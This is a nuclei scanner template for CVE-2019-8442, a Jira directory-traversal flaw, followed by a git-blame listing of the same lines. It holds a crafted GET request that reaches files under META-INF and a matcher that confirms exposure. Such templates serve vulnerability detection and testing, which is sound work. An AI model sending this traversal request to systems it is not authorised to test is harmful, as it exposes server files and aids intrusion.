nuclei-templates/cves/2019/CVE-2019-8442.yaml

id: CVE-2019-8442
info:
  name: JIRA Directory Traversal
  author: Kishore Krishna (siLLyDaddy)
  severity: medium
  description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
  reference: https://jira.atlassian.com/browse/JRASERVER-69241
  tags: cve,cve2019,atlassian,jira,lfi

requests:
  - raw:
      - |
        GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: deflate

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - <groupId>com.atlassian.jira</groupId>
        part: body
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-8442`
Create CVE-2019-8442.yaml 2020-10-02 19:50:52 +00:00			`info:`
			`name: JIRA Directory Traversal`
			`author: Kishore Krishna (siLLyDaddy)`
			`severity: medium`
Missing reference 2021-03-30 07:16:57 +00:00			`description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.`
			`reference: https://jira.atlassian.com/browse/JRASERVER-69241`
tag improvements 2021-03-18 07:54:36 +00:00			`tags: cve,cve2019,atlassian,jira,lfi`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00
Create CVE-2019-8442.yaml 2020-10-02 19:50:52 +00:00			`requests:`
Fixed an issue with gzip encoding 2021-02-12 12:38:21 +00:00			`- raw:`
			`- \|`
			`GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Accept-Encoding: deflate`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00
Create CVE-2019-8442.yaml 2020-10-02 19:50:52 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
updates 2020-10-03 05:57:10 +00:00			`- <groupId>com.atlassian.jira</groupId>`
Fixed an issue with gzip encoding 2021-02-12 12:38:21 +00:00			`part: body`